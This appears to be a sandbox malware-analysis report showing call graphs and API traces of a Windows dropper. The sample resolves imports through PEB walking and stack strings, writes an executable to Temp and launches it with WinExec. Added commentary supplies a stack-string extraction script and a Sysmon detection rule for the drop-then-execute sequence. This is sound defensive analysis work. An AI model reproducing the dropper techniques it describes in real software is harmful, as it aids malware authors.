Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26578->26581 26579 33f847 26580 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26579->26580 26582 33f85a 26580->26582 26581->26582 26583 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26582->26583 26584 33f89d 26583->26584 26584->26464 26586 325f62 Concurrency::cancellation_token_source::~cancellation_token_source 26585->26586 26588 325fb5 26586->26588 26692 312010 26586->26692 26588->26479 26589->26516 26590->26518 26591->26519 26593 326220 __InternalCxxFrameHandler 26592->26593 26594 326266 26592->26594 26593->26527 26603 328170 27 API calls 4 library calls 26594->26603 26597 32548a 26596->26597 26598 326200 27 API calls 26597->26598 26599 32549d 26598->26599 26599->26524 26600->26524 26601->26529 26602->26531 26603->26593 26605 340d3a 26604->26605 26606 340d49 __wsopen_s 26605->26606 26614 329600 5 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26605->26614 26609 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26606->26609 26608 340d8d 26611 340de5 26608->26611 26615 311260 RaiseException Concurrency::cancel_current_task 26608->26615 26610 33fa10 26609->26610 26610->26542 26616 311fd0 27 API calls _Allocate 26611->26616 26614->26608 26615->26611 26616->26606 26618 3403f6 26617->26618 26619 3403db 26617->26619 26621 340403 26618->26621 26626 34052b 26618->26626 26620 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26619->26620 26633 3403ee 26620->26633 26622 311810 27 API calls 26621->26622 26623 340410 26622->26623 26625 325470 27 API calls 26623->26625 26624 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26627 33f707 26624->26627 26628 340423 26625->26628 26629 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26626->26629 26627->26558 26627->26559 26630 
311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26628->26630 26629->26633 26631 340515 26630->26631 26632 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26631->26632 26632->26633 26633->26624 26635 3407dc 26634->26635 26636 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26635->26636 26637 34081f 26636->26637 26637->26567 26639 340639 GetLastError 26638->26639 26640 34061b 26638->26640 26644 34066e 26639->26644 26645 34078a 26639->26645 26641 324ef0 27 API calls 26640->26641 26642 340628 26641->26642 26647 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26642->26647 26648 324ef0 27 API calls 26644->26648 26646 324ef0 27 API calls 26645->26646 26646->26642 26649 33f7d3 26647->26649 26650 34067b 26648->26650 26649->26570 26669 340e60 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 26649->26669 26651 325ff0 27 API calls 26650->26651 26652 340731 26650->26652 26651->26652 26653 325f50 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26652->26653 26653->26642 26670 3411a0 26654->26670 26657 326200 27 API calls 26658 340fd6 26657->26658 26659 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26658->26659 26660 340fe8 26659->26660 26661 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26660->26661 26662 33f834 26661->26662 26663 340830 26662->26663 26666 340853 ___scrt_fastfail 26663->26666 26668 34084c 26663->26668 26664 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26665 33f840 26664->26665 26665->26578 26665->26579 26667 326200 27 API calls 26666->26667 26666->26668 26667->26666 26668->26664 26669->26570 26673 341510 26670->26673 26682 3296b0 26673->26682 26675 341589 26677 3415a5 26675->26677 26679 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 
API calls 26675->26679 26680 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26677->26680 26678 341552 26678->26675 26689 311bb0 27 API calls 26678->26689 26679->26677 26681 340f8f 26680->26681 26681->26657 26683 3296c6 26682->26683 26684 3296c4 26682->26684 26683->26684 26685 3296de 26683->26685 26687 32970b 26683->26687 26684->26678 26690 330900 27 API calls 4 library calls 26685->26690 26687->26684 26691 326100 11 API calls 3 library calls 26687->26691 26689->26678 26690->26684 26691->26684 26693 312048 error_info_injector 26692->26693 26694 31203b 26692->26694 26693->26588 26696 311320 11 API calls _Allocate 26694->26696 26696->26693 26697->26023 26698->26058 26699->26076 26700->26097 26701->26101 26702->26108 26703->26141 26704->26144 26705->26149 26706->26154 26707->26159 26708->26207 26709->26080 26710->26042 26711->26093 26712->26070 26713->26098 26714->26099 26716 353a9b _unexpected 34 API calls 26715->26716 26717 3190de 26716->26717 26717->26146 26718->26184 26719->26148 26720->26228 26722 32635a 26721->26722 26723 326369 __wsopen_s 26722->26723 26729 311b00 5 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26722->26729 26726 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26723->26726 26725 3263b1 26730 311fd0 27 API calls _Allocate 26725->26730 26727 321f1e 26726->26727 26727->26257 26729->26725 26730->26723 26733 3113c7 26731->26733 26732 311555 26734 3116e5 26732->26734 26735 311593 26732->26735 26752 34947a 5 API calls ___report_securityfailure 26732->26752 26733->26732 26751 311bb0 27 API calls 26733->26751 26736 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 26734->26736 26740 3116be 26735->26740 26753 311bb0 27 API calls 26735->26753 26737 311709 26736->26737 26739 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26737->26739 26742 311721 26739->26742 26740->26734 26754 311bb0 27 API calls 
26740->26754 26745 3133d0 26742->26745 26746 3133ef 26745->26746 26747 325560 27 API calls 26746->26747 26749 313404 26746->26749 26748 31354c 26747->26748 26748->26276 26749->26276 26750->26290 26751->26733 26752->26732 26753->26735 26754->26740 26755->26357 26756->26389
                                                APIs
                                                Strings
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00315D87
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00319B2E
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00318C75
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00317B97
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00318505
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: Content-Type: application/x-www-form-urlencoded$Content-Type: application/x-www-form-urlencoded$Content-Type: application/x-www-form-urlencoded$Content-Type: application/x-www-form-urlencoded$Content-Type: application/x-www-form-urlencoded
                                                • API String ID: 3732870572-2585428591
                                                • Opcode ID: efeb8c0ba0624f6a2b82bbb341261d03d85d13a6c9b0e7b658581fcc4e6b02bc
                                                • Instruction ID: 9a2bb8661eb30a6df8b4f694d28679a6800e8915d075d4bf5845758f29486990
                                                • Opcode Fuzzy Hash: efeb8c0ba0624f6a2b82bbb341261d03d85d13a6c9b0e7b658581fcc4e6b02bc
                                                • Instruction Fuzzy Hash: 71A314B0D056A88BEB66CB28CC41BDABBB5AF99304F1481D9E54CA7251DB706FC5CF40

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 585 374044-374074 GetPEB 586 374077-37409a 585->586 587 37409d-3740a0 586->587 588 3740a6-3740bc 587->588 589 3741ee-37422b CreateFileA 587->589 590 374110-374116 588->590 591 3740be-3740c5 588->591 610 374265-374269 589->610 611 37422d-374230 589->611 594 374129-37412f 590->594 595 374118-37411f 590->595 591->590 592 3740c7-3740ce 591->592 592->590 596 3740d0-3740d7 592->596 598 374131-374138 594->598 599 374148-37414e 594->599 595->594 597 374121-374124 595->597 596->590 600 3740d9-3740dd 596->600 602 3741bb-3741c0 597->602 598->599 603 37413a-374141 598->603 604 374167-37416f 599->604 605 374150-374157 599->605 600->590 607 3740df-3740e3 600->607 613 3741c2-3741c5 602->613 614 3741e0-3741e9 602->614 603->599 612 374143-374146 603->612 608 374171-374178 604->608 609 374188-37418e 604->609 605->604 606 374159-374160 605->606 606->604 615 374162-374165 606->615 607->602 616 3740e9-37410b 607->616 608->609 617 37417a-374181 608->617 618 3741a7-3741ad 609->618 619 374190-374197 609->619 620 374232-374238 611->620 612->602 613->614 621 3741c7-3741ca 613->621 614->587 615->602 616->586 617->609 623 374183-374186 617->623 618->602 625 3741af-3741b6 618->625 619->618 624 374199-3741a0 619->624 626 374246-374252 WriteFile 620->626 627 37423a-374242 620->627 621->614 622 3741cc-3741cf 621->622 622->614 628 3741d1-3741d4 622->628 623->602 624->618 630 3741a2-3741a5 624->630 625->602 631 3741b8 625->631 633 374255-374262 FindCloseChangeNotification WinExec 626->633 627->620 632 374244 627->632 628->614 634 3741d6-3741d9 628->634 630->602 631->602 632->633 633->610 634->614 635 3741db-3741de 634->635 635->589 635->614
                                                APIs
                                                • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00374223
                                                • WriteFile.KERNELBASE(00000000,FFFD57E4,00003E00,?,00000000), ref: 00374252
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00374256
                                                • WinExec.KERNEL32(?,00000005), ref: 00374262
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                                • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$vXQpuA.exe
                                                • API String ID: 2234911746-1821406457
                                                • Opcode ID: 2532cd4db011b8cb9ee9df0a338f0a98687558aa1ab7fc38e3564c7ef64f7ef5
                                                • Instruction ID: abd417404eaacf5b624339f16b685b261bea8c78829bc180fb28b830eff16712
                                                • Opcode Fuzzy Hash: 2532cd4db011b8cb9ee9df0a338f0a98687558aa1ab7fc38e3564c7ef64f7ef5
                                                • Instruction Fuzzy Hash: A8612978D00215DBCF36DF94D884AADBBB4BF54315F66C1AAD409AB601C338AEC1CB95
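The stub at 374044 lives in the RWX region at 374000, locates Kernel32 through the PEB (the GetPEB node at the top of the graph) and resolves the imports it needs by name. The String ID row shows those names arriving as 4-byte fragments (Kern/el32/.dll, Crea/teFi/leA, Writ/eFil/e, WinE/xec, lstr/catA, GetT/athA, GetM/odul/dleA, Clos/dle...), which is the classic stack-string idiom: each fragment is one `push imm32` or one `mov dword [ebp+disp], imm32`. Two caveats when reading the API list: the report sorts fragments alphabetically, so the instruction order has to be recovered from the code; and `FindCloseChangeNotification` in KernelBase shares its export address with `CloseHandle`, so a symbolizer labels an ordinary `CloseHandle(h)` between the `WriteFile` and the `WinExec` that way, consistent with the Clos fragment. The Python below is an added example, not code from the report or from the sample: it rebuilds stack strings from raw x86 bytes. Its input is a constructed stub that mimics the idiom (both fragment forms, `call` targets zeroed, plus a `push 0x3E00` size argument that must not be mistaken for text); nothing in it is bytes from the sample.

```python
import struct
from typing import List, Tuple

# x86 opcodes used by the two stack-string idioms this scanner understands.
PUSH_IMM32 = 0x68            # push imm32
PUSH_IMM8 = 0x6A             # push imm8 (sign-extended to a dword on the stack)
MOV_EBP_DISP8 = b"\xC7\x45"  # mov dword [ebp+disp8], imm32


def asm_push(chunk: bytes) -> bytes:
    """Encode `push imm32` for a 4-byte fragment (helper to build the sample)."""
    assert len(chunk) == 4
    return bytes([PUSH_IMM32]) + chunk


def asm_mov_ebp(disp: int, chunk: bytes) -> bytes:
    """Encode `mov dword [ebp+disp8], imm32` for a 4-byte fragment."""
    assert len(chunk) == 4
    return MOV_EBP_DISP8 + struct.pack("<b", disp) + chunk


# Constructed stub (not bytes from the sample) exercising both idioms.
SAMPLE = (
    b"\x55\x8B\xEC"                                   # push ebp / mov ebp, esp
    + b"\x6A\x00"                                     # push 0 (NUL terminator)
    + asm_push(b".dll") + asm_push(b"el32") + asm_push(b"Kern")
    + b"\x54"                                         # push esp -> "Kernel32.dll"
    + b"\xE8\x00\x00\x00\x00"                         # call rel32 (target zeroed)
    + asm_push(b"xec\x00") + asm_push(b"WinE")
    + b"\x54"                                         # push esp -> "WinExec"
    + b"\xE8\x00\x00\x00\x00"
    + asm_mov_ebp(-12, b"Writ") + asm_mov_ebp(-8, b"eFil") + asm_mov_ebp(-4, b"e\x00\x00\x00")
    + b"\x68\x00\x3E\x00\x00"                         # push 0x3E00: a size, not text
    + b"\xC3"                                         # ret
)


def _printable_runs(blob: bytes, min_len: int) -> List[str]:
    """Split reassembled stack bytes on NUL; keep printable ASCII runs >= min_len."""
    return [
        piece.decode("ascii")
        for piece in blob.split(b"\x00")
        if len(piece) >= min_len and all(0x20 <= c < 0x7F for c in piece)
    ]


def stack_strings(code: bytes, min_len: int = 4) -> List[str]:
    """Recover strings that were assembled 4 bytes at a time on the stack.

    push runs: fragments are pushed last-to-first, so the run is reversed.
    mov runs:  fragments are ordered by displacement, lowest address first.
    This is a byte-level heuristic rather than a disassembler, so it may
    start mid-instruction; the printable filter and min_len drop the noise.
    """
    found: List[str] = []
    push_run: List[bytes] = []
    mov_run: List[Tuple[int, bytes]] = []

    def flush() -> None:
        if push_run:
            found.extend(_printable_runs(b"".join(reversed(push_run)), min_len))
            push_run.clear()
        if mov_run:
            ordered = [imm for _, imm in sorted(mov_run, key=lambda t: t[0])]
            found.extend(_printable_runs(b"".join(ordered), min_len))
            mov_run.clear()

    i, n = 0, len(code)
    while i < n:
        op = code[i]
        if op == PUSH_IMM32 and i + 5 <= n:
            if mov_run:
                flush()
            push_run.append(code[i + 1:i + 5])
            i += 5
        elif op == PUSH_IMM8 and i + 2 <= n:
            if mov_run:
                flush()
            imm8 = struct.unpack("<b", code[i + 1:i + 2])[0]
            push_run.append(struct.pack("<i", imm8))   # sign-extended dword
            i += 2
        elif code[i:i + 2] == MOV_EBP_DISP8 and i + 7 <= n:
            if push_run:
                flush()
            disp = struct.unpack("<b", code[i + 2:i + 3])[0]
            mov_run.append((disp, code[i + 3:i + 7]))
            i += 7
        else:
            flush()                # any other byte ends the current run
            i += 1
    flush()
    return found


if __name__ == "__main__":
    for s in stack_strings(SAMPLE):
        print(s)
```

Run it over the bytes of the 374000 region (or any dumped code) and the API names the stub resolves fall out in instruction order; the filter also explains why the report's own string list shows only the fragments of four printable bytes. Because the scan is not instruction-aware, expect occasional garbage from data that happens to contain 0x68 or 0xC7 0x45; raise `min_len` or cross-check hits against the import names you expect from the API list.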

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 636 3219b0-321c69 call 35fbd0 call 351f09 call 34cf64 LoadLibraryA * 2 643 324ca2-324cb6 call 349348 636->643 644 321c6f-321c76 636->644 644->643 646 321c7c-321c86 call 31acd0 644->646 650 321daf-321f25 call 315ba0 call 327080 call 325560 call 31b1f0 646->650 651 321c8c-321daa call 35f900 call 360f90 Sleep 646->651 663 321f2a-3220f7 call 34ac10 GetModuleFileNameA call 34ac10 GetUserNameA call 3203e0 call 327220 call 313230 650->663 651->646 674 3222cf-3222e8 call 3279e0 663->674 675 3220fd-32226e call 327220 663->675 682 322f5a-322f96 call 311810 call 3279e0 call 311a20 674->682 683 3222ee-32250b call 311810 call 325560 call 31b1f0 call 35f900 * 3 call 360f90 call 3124d0 674->683 680 322270-32227a 675->680 681 32227c 675->681 684 322286-32228f 680->684 681->684 701 322fb7-322fca 682->701 702 322f98-322fb4 call 311810 call 320a20 682->702 736 322873-3229d9 683->736 737 322511 683->737 688 322291-3222a5 684->688 689 3222ab-3222ca DeleteFileA call 311a20 684->689 688->689 689->674 705 323da3-3244a4 call 311810 call 3271a0 call 327340 call 327400 call 327340 call 311a20 * 4 701->705 706 322fd0-3234e4 call 313ed0 call 325560 call 31c450 call 327080 call 327340 call 327400 call 325560 call 31b1f0 call 311a20 * 2 call 325210 call 35f900 * 2 call 312400 701->706 702->701 774 3244b2 705->774 775 3244a6-3244b0 705->775 814 3234e6-3234f2 706->814 815 3234f8-32365e 706->815 739 3229e7 736->739 740 3229db-3229e5 736->740 742 322513-32251f 737->742 743 322525-32280c 737->743 746 3229f1-3229fa 739->746 740->746 742->736 742->743 744 322812-32282e 743->744 744->744 748 322830-32286e call 311c20 744->748 750 322a16-322a3a call 34a630 746->750 751 3229fc-322a10 746->751 748->736 762 322a48 750->762 763 322a3c-322a46 750->763 751->750 766 322a52-322e35 call 3137b0 call 313560 call 327340 call 327440 call 327340 call 311a20 * 4 call 343c20 call 35f900 * 2 call 312400 762->766 763->766 870 322e43 766->870 871 
322e37-322e41 766->871 778 3244bc-3244c5 774->778 775->778 782 3244e1-324505 WinExec 778->782 783 3244c7-3244db 778->783 784 324c71 call 3202c0 782->784 785 32450b-324c0c call 311810 call 3271a0 call 327340 call 327400 call 327340 call 311a20 * 4 782->785 783->782 795 324c76-324c9d call 311a20 * 4 784->795 861 324c1a 785->861 862 324c0e-324c18 785->862 795->643 814->815 819 323d82-323d9e call 311a20 * 3 814->819 820 323660-32366a 815->820 821 32366c 815->821 819->705 826 323676-32367f 820->826 821->826 830 323681-323695 826->830 831 32369b-3236bf call 34a630 826->831 830->831 842 3236c1-3236cb 831->842 843 3236cd 831->843 847 3236d7-323aba call 3137b0 call 313560 call 327340 call 327440 call 327340 call 311a20 * 4 call 343c20 call 35f900 * 2 call 312400 842->847 843->847 914 323ac8 847->914 915 323abc-323ac6 847->915 865 324c24-324c2d 861->865 862->865 868 324c49-324c6f WinExec call 311a20 865->868 869 324c2f-324c43 865->869 868->795 869->868 874 322e4d-322e56 870->874 871->874 877 322e72-322eac 874->877 878 322e58-322e6c 874->878 880 322eba 877->880 881 322eae-322eb8 877->881 878->877 883 322ec4-322ecd 880->883 881->883 885 322ee9-322f21 call 3432c0 883->885 886 322ecf-322ee3 883->886 893 322f42-322f58 call 311a20 * 2 885->893 894 322f23-322f3f call 325560 call 320a20 885->894 886->885 893->701 894->893 916 323ad2-323adb 914->916 915->916 917 323af7-323b31 916->917 918 323add-323af1 916->918 919 323b33-323b3d 917->919 920 323b3f 917->920 918->917 921 323b49-323b52 919->921 920->921 922 323b54-323b68 921->922 923 323b6e-323ba6 call 3432c0 921->923 922->923 926 323d77-323d7d call 311a20 923->926 927 323bac-323bf2 923->927 926->819 929 323c00 927->929 930 323bf4-323bfe 927->930 931 323c0a-323c13 929->931 930->931 932 323c15-323c29 931->932 933 323c2f-323d71 ShellExecuteA 931->933 932->933 933->926
                                                APIs
                                                  • Part of subcall function 00351F09: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00351F1C
                                                  • Part of subcall function 00351F09: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00351F4D
                                                • LoadLibraryA.KERNELBASE(?), ref: 00321B22
                                                • LoadLibraryA.KERNELBASE(?), ref: 00321C61
                                                • __aulldiv.LIBCMT ref: 00321D80
                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,0000003D,00000000,00000006,00000000), ref: 00321DA4
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00321F51
                                                • GetUserNameA.ADVAPI32(?,00000104), ref: 00321F85
                                                • DeleteFileA.KERNEL32(?), ref: 003222BE
                                                • operator!=.LIBCPMTD ref: 003222DB
                                                • __aulldiv.LIBCMT ref: 003224C2
                                                • operator!=.LIBCPMTD ref: 00322F74
                                                  • Part of subcall function 00320A20: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,8CDA9266), ref: 00320A6F
                                                  • Part of subcall function 00320A20: DeleteFileA.KERNEL32(?), ref: 00320BAE
                                                • _strstr.LIBCMT ref: 003236B5
                                                  • Part of subcall function 00313560: __aulldiv.LIBCMT ref: 003136F6
                                                  • Part of subcall function 00343C20: GetProcAddress.KERNEL32(00323A15,?), ref: 00343F74
                                                • _strstr.LIBCMT ref: 00322A30
                                                  • Part of subcall function 00313560: SHGetFolderPathA.SHELL32(00000000,00000000), ref: 003135F6
                                                  • Part of subcall function 00343C20: GetProcAddress.KERNEL32(00323A15,?), ref: 00343D7D
                                                  • Part of subcall function 00312400: __aulldiv.LIBCMT ref: 00312482
                                                • ShellExecuteA.SHELL32(00000000,?,?,00000000,00000000,00000001), ref: 00323D71
                                                • WinExec.KERNEL32(?,00000000), ref: 003244F6
                                                • WinExec.KERNEL32(?,00000000), ref: 00324C5E
                                                  • Part of subcall function 003202C0: StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 003203C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File__aulldiv$AddressDeleteExecLibraryLoadNameProcTime_strstroperator!=$CtrlDispatcherExecuteFolderManagerModuleOpenPathServiceShellSleepStartSystemUnothrow_t@std@@@User__ehfuncinfo$??2@
                                                • String ID: 0.8
                                                • API String ID: 2325502147-4163865904
                                                • Opcode ID: e49e422e5495216eb3aea5b7e603d10148a43d01c0e5cf8172f59e3e68147697
                                                • Instruction ID: a0d9ee9bcb45a718b5bc7ba1c6572bbf163cd43fbbd3747d3aa1f6a5a805c048
                                                • Opcode Fuzzy Hash: e49e422e5495216eb3aea5b7e603d10148a43d01c0e5cf8172f59e3e68147697
                                                • Instruction Fuzzy Hash: 18630474D096A88ADB66CF289C81BEABBB1AF59305F0481D9D94C77211EB306FC5CF41
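The routine at 3219b0 resolves its own path with GetModuleFileNameA, deletes a file with DeleteFileA, and launches executables through WinExec (twice) and ShellExecuteA; the stub at 374044 writes a file whose name is built from GetTempPathA and ends in vXQpuA.exe, then runs it with WinExec. Both end in the same host-observable sequence: a process writes an executable under Temp and then appears as the parent of that executable's process a moment later. That sequence can be detected from endpoint telemetry without knowing the dropped filename. The Python below is an added example and not part of the report: it correlates Sysmon-style FileCreate (Event ID 11) and ProcessCreate (Event ID 1) records. The events are constructed to mirror the behaviour seen here; the field names follow Sysmon's, while the paths, PIDs, timestamps and the 30-second window are assumptions for illustration.

```python
import re
from datetime import datetime
from typing import Dict, List

# Constructed Sysmon-style records (not telemetry from the report). Field names
# follow Sysmon's Event ID 11 (FileCreate) and Event ID 1 (ProcessCreate);
# paths, PIDs and timestamps are invented to mirror the drop-then-run sequence.
SAMPLE_EVENTS = [
    {"EventID": 11, "UtcTime": "2024-07-20 10:00:01.100", "ProcessId": 4120,
     "Image": r"C:\Users\user\Desktop\sample.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\vXQpuA.exe"},
    {"EventID": 1, "UtcTime": "2024-07-20 10:00:01.350", "ProcessId": 4188,
     "ParentProcessId": 4120,
     "Image": r"C:\Users\user\AppData\Local\Temp\vXQpuA.exe",
     "CommandLine": r"C:\Users\user\AppData\Local\Temp\vXQpuA.exe"},
    # Installer-style pair: a helper is unpacked to Temp but started half an
    # hour later by an unrelated parent, so it must not fire.
    {"EventID": 11, "UtcTime": "2024-07-20 10:05:00.000", "ProcessId": 5000,
     "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\helper.exe"},
    {"EventID": 1, "UtcTime": "2024-07-20 10:30:00.000", "ProcessId": 5100,
     "ParentProcessId": 777,
     "Image": r"C:\Users\user\AppData\Local\Temp\helper.exe",
     "CommandLine": "helper.exe"},
    # A non-executable written to Temp by the same process is ignored.
    {"EventID": 11, "UtcTime": "2024-07-20 10:00:02.000", "ProcessId": 4120,
     "Image": r"C:\Users\user\Desktop\sample.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\notes.txt"},
]

# Executable image written anywhere below a Temp directory.
TEMP_EXE = re.compile(r"\\temp\\.*\.(?:exe|dll|scr|com)$", re.IGNORECASE)


def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def temp_drop_then_exec(events: List[Dict], window_seconds: float = 30.0) -> List[Dict]:
    """Flag a process that writes an executable under Temp and then launches it.

    Correlation keys: the created path (case-folded, since NTFS lookups are
    case-insensitive) and creator PID == ParentProcessId of the new process.
    The short window is a tuning assumption that keeps unpack-now-run-later
    installer activity out of the alerts.
    """
    alerts: List[Dict] = []
    pending: Dict[str, Dict] = {}   # lower-cased dropped path -> FileCreate event
    for ev in sorted(events, key=lambda e: parse_time(e["UtcTime"])):
        if ev["EventID"] == 11:
            if TEMP_EXE.search(ev["TargetFilename"]):
                pending[ev["TargetFilename"].lower()] = ev
        elif ev["EventID"] == 1:
            creator = pending.get(ev["Image"].lower())
            if creator is None:
                continue
            age = (parse_time(ev["UtcTime"]) - parse_time(creator["UtcTime"])).total_seconds()
            if ev.get("ParentProcessId") == creator["ProcessId"] and 0 <= age <= window_seconds:
                alerts.append({
                    "rule": "temp_drop_then_exec",
                    "dropper_pid": creator["ProcessId"],
                    "dropper_image": creator["Image"],
                    "dropped": creator["TargetFilename"],
                    "child_pid": ev["ProcessId"],
                    "seconds_between": age,
                })
    return alerts


if __name__ == "__main__":
    for alert in temp_drop_then_exec(SAMPLE_EVENTS):
        print(alert)
```

In the common case both WinExec and ShellExecuteA on an .exe produce an Event ID 1 whose parent is the calling process, which is what the parent check relies on; a loader that launches through a broker would break that link, so treat the parent condition as a precision lever rather than a guarantee and widen the window before dropping it. PID reuse across the window is the other false-negative source; Sysmon's ProcessGuid fields avoid it where available.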

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 934 31b1f0-31b3fc call 35f900 * 2 call 312400 call 35f900 call 360f90 946 31b402 934->946 947 31c3f8-31c42f call 311810 call 311a20 * 2 934->947 948 31b404-31b410 946->948 949 31b416-31b446 946->949 970 31c432-31c44f call 349348 947->970 948->947 948->949 954 31b736-31b776 949->954 955 31b44c-31b456 call 34cf43 949->955 957 31b784 954->957 958 31b778-31b782 954->958 966 31b458-31b45c 955->966 967 31b45d-31b45f 955->967 961 31b78e-31b797 957->961 958->961 964 31b7b3-31b958 call 311390 call 3133d0 call 327080 call 34cf43 961->964 965 31b799-31b7ad 961->965 992 31b95a-31b95e 964->992 993 31b95f-31b961 964->993 965->964 966->967 968 31b461-31b472 call 34ac10 967->968 969 31b474-31b4c6 967->969 973 31b4cd-31b4ed call 34cf43 968->973 969->973 983 31b4f4-31b4f6 973->983 984 31b4ef-31b4f3 973->984 986 31b514-31b51e call 34cf43 983->986 987 31b4f8-31b50a 983->987 984->983 994 31b520-31b524 986->994 995 31b525-31b527 986->995 987->986 992->993 996 31b963-31b975 993->996 997 31b97f-31b9ca call 312120 call 311ac0 call 349554 993->997 994->995 998 31b529-31b53a call 34ac10 995->998 999 31b53c-31b58e 995->999 996->997 1014 31b9f5 997->1014 1015 31b9cc-31b9f3 call 34ac10 call 33d8c0 997->1015 1001 31b595-31b63d call 35f900 * 2 call 312400 998->1001 999->1001 1019 31b64b 1001->1019 1020 31b63f-31b649 1001->1020 1018 31b9ff-31bf65 call 327080 call 35f900 * 2 call 312400 